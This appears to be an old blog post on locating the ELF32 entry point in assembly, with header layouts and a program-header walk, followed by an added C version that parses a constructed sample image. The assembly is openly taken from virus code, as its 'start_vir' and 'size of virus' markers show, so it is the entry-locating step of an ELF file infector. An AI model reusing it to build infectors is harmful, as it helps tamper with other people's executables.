Wednesday, October 04, 2006

ELF entry calculation in asm

There are two ways to access the ELF header fields: directly, by knowing the offset of the field you need inside the header, or by filling a small structure with the first bytes of the file and then accessing the structure's fields by name.



main:
...
end:
e_ident:
.long 0
.long 0
.long 0
.long 0          # 16 bytes: magic, class, data, version, padding
e_type:
.word 0          # 2 bytes (Elf32_Half); .int would reserve 4 and shift every following field
e_machine:
.word 0          # 2 bytes
e_version:
.long 0          # 4 bytes (Elf32_Word)
e_entry:
.long 0          # 4 bytes (Elf32_Addr), at offset 0x18 from the start of the header

(structure in AT&T/GAS syntax)

ELF struct
  e_ident      dd 4 dup(?)   ; 16 bytes
  e_type       dw ?          ; 2 bytes
  e_machine    dw ?          ; 2 bytes
  e_version    dd ?          ; 4 bytes (Elf32_Word); dw would misplace e_entry
  e_entry      dd ?          ; 4 bytes, offset 0x18
ELF ends

(structure in Intel/MASM-style syntax)

Filling a structure is the easy way: it only needs the open() and read() syscalls.
But when several accesses to different parts of the file image are needed, issuing a read() for each one is not the best approach. It is better to map the file (mmap()) and work with pointers into the image, so every header field and every program header is reachable by adding an offset to the base address.


store_init:
movl $end_vir, %ecx
subl $start_vir, %ecx
movl %ecx, -16(%ebp) # -16(%ebp) -> size of virus + 5

# %eax holds the base address of the mapped file image; every ELF header
# offset below is relative to it (0x18 = e_entry, 0x1c = e_phoff,
# 0x2a = e_phentsize, 0x2c = e_phnum).
leal -500(%ebp), %edi # edi -> local buffer at -500(%ebp)
movl 0x18(%eax), %esi # esi -> e_entry (virtual address of the entry point)
movzwl 0x2c(%eax), %ecx # ecx -> e_phnum, number of program headers (counts down); 16-bit field, so zero-extend

first_ph:
movl 0x1c(%eax), %edx # edx -> e_phoff (file offset of the program header table)
addl %eax, %edx # edx -> VA of the first program header inside the mapped image

seek_ph:
cmpl %esi, 0x08(%edx) # p_vaddr <= e_entry ? then this program header is the one
jna destiny           # otherwise (p_vaddr > e_entry) try the next program header

next_ph:
movzwl 0x2a(%eax), %ebx # e_phentsize, read from the ELF header (not from the program header); %ebx assumed free as scratch
addl %ebx, %edx       # edx -> next program header
loop seek_ph          # if no header matched, falls through to destiny with the last one

destiny: ######### THE MAIN KEY ##########
subl 0x08(%edx), %esi # esi -> e_entry - p_vaddr
addl 0x04(%edx), %esi # esi -> e_entry - p_vaddr + p_offset (file offset of the entry point)
addl %eax, %esi # esi -> VA of the entry point inside the mapped image
movl %esi, %edx

#EOF
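The same walk in C, as an added example that is not the author's code: it reads the header fields from a file image held in memory (what you have after mapping the file), steps through the program header table by e_phentsize, and converts e_entry into a file offset exactly as the asm does. The 0x400-byte ELF32 image with two PT_LOAD segments is constructed inside the block, and the function names and the structure names Ehdr32/Phdr32 are my own.

```c
/* Translate e_entry (a virtual address) into a file offset by walking the
 * program header table. Added example; the image is built in memory. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define PT_LOAD 1

/* ELF32 header; the byte offsets in the comments are the ones the asm hard-codes. */
typedef struct {
    uint8_t  e_ident[16];
    uint16_t e_type;      /* 0x10 */
    uint16_t e_machine;   /* 0x12 */
    uint32_t e_version;   /* 0x14 */
    uint32_t e_entry;     /* 0x18 */
    uint32_t e_phoff;     /* 0x1c */
    uint32_t e_shoff;     /* 0x20 */
    uint32_t e_flags;     /* 0x24 */
    uint16_t e_ehsize;    /* 0x28 */
    uint16_t e_phentsize; /* 0x2a */
    uint16_t e_phnum;     /* 0x2c */
    uint16_t e_shentsize; /* 0x2e */
    uint16_t e_shnum;     /* 0x30 */
    uint16_t e_shstrndx;  /* 0x32 */
} Ehdr32;

typedef struct {
    uint32_t p_type;
    uint32_t p_offset;    /* 0x04 */
    uint32_t p_vaddr;     /* 0x08 */
    uint32_t p_paddr;
    uint32_t p_filesz;
    uint32_t p_memsz;
    uint32_t p_flags;
    uint32_t p_align;
} Phdr32;

/* Returns the file offset e_entry maps to, or -1 if the buffer is not an ELF32
 * image, the program header table runs past the end of the buffer, or no
 * PT_LOAD segment holds the entry point in its file-backed part. */
int64_t elf32_entry_file_offset(const uint8_t *img, size_t len)
{
    Ehdr32 eh;
    if (len < sizeof eh) return -1;
    memcpy(&eh, img, sizeof eh);
    if (memcmp(eh.e_ident, "\x7f" "ELF\x01", 5) != 0) return -1; /* magic + ELFCLASS32 */
    if (eh.e_phentsize < sizeof(Phdr32)) return -1;
    if ((uint64_t)eh.e_phoff + (uint64_t)eh.e_phnum * eh.e_phentsize > len) return -1;

    for (unsigned i = 0; i < eh.e_phnum; i++) {
        Phdr32 ph;
        /* step by e_phentsize taken from the ELF header, never by a constant */
        memcpy(&ph, img + eh.e_phoff + (size_t)i * eh.e_phentsize, sizeof ph);
        if (ph.p_type != PT_LOAD) continue;
        if (eh.e_entry >= ph.p_vaddr && eh.e_entry - ph.p_vaddr < ph.p_filesz)
            return (int64_t)(eh.e_entry - ph.p_vaddr + ph.p_offset);
    }
    return -1;
}

/* Constructed sample image: text segment at 0x08048000 backed by file 0x000,
 * data segment at 0x08049200 backed by file 0x200, 0x200 bytes each. */
static size_t build_sample(uint8_t *buf, size_t cap, uint32_t entry)
{
    Ehdr32 eh = {0};
    Phdr32 ph[2] = {{0}, {0}};
    if (cap < 0x400) return 0;
    memset(buf, 0, 0x400);
    memcpy(eh.e_ident, "\x7f" "ELF\x01\x01\x01", 7); /* ELFCLASS32, little-endian, EV_CURRENT */
    eh.e_type = 2; eh.e_machine = 3; eh.e_version = 1; /* ET_EXEC, EM_386 */
    eh.e_entry = entry;
    eh.e_phoff = sizeof eh; eh.e_ehsize = sizeof eh;
    eh.e_phentsize = sizeof(Phdr32); eh.e_phnum = 2;
    ph[0].p_type = PT_LOAD; ph[0].p_offset = 0x000; ph[0].p_vaddr = 0x08048000;
    ph[0].p_filesz = ph[0].p_memsz = 0x200; ph[0].p_flags = 5; ph[0].p_align = 0x1000;
    ph[1].p_type = PT_LOAD; ph[1].p_offset = 0x200; ph[1].p_vaddr = 0x08049200;
    ph[1].p_filesz = ph[1].p_memsz = 0x200; ph[1].p_flags = 6; ph[1].p_align = 0x1000;
    memcpy(buf, &eh, sizeof eh);
    memcpy(buf + eh.e_phoff, ph, sizeof ph);
    return 0x400;
}

/* Builds the sample image with the given e_entry and resolves it. */
int64_t demo_entry_offset(uint32_t entry)
{
    uint8_t img[0x400];
    size_t n = build_sample(img, sizeof img, entry);
    return elf32_entry_file_offset(img, n);
}

/* Same image but only the ELF header is in bounds: the table check must reject it. */
int64_t demo_truncated(void)
{
    uint8_t img[0x400];
    build_sample(img, sizeof img, 0x08048100);
    return elf32_entry_file_offset(img, sizeof(Ehdr32));
}

int main(void)
{
    printf("entry 0x08048100 -> file offset %lld\n", (long long)demo_entry_offset(0x08048100));
    printf("entry 0x08049210 -> file offset %lld\n", (long long)demo_entry_offset(0x08049210));
    printf("entry 0x08040000 -> %lld (not in any PT_LOAD)\n", (long long)demo_entry_offset(0x08040000));
    printf("truncated image -> %lld\n", (long long)demo_truncated());
    return 0;
}
```

Unlike the asm, which takes the first program header whose p_vaddr is not above e_entry, this version only accepts a PT_LOAD segment whose file-backed range contains the entry point, and it refuses an image whose program header table does not fit in the buffer; both checks matter when the file being inspected cannot be trusted to be well-formed.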
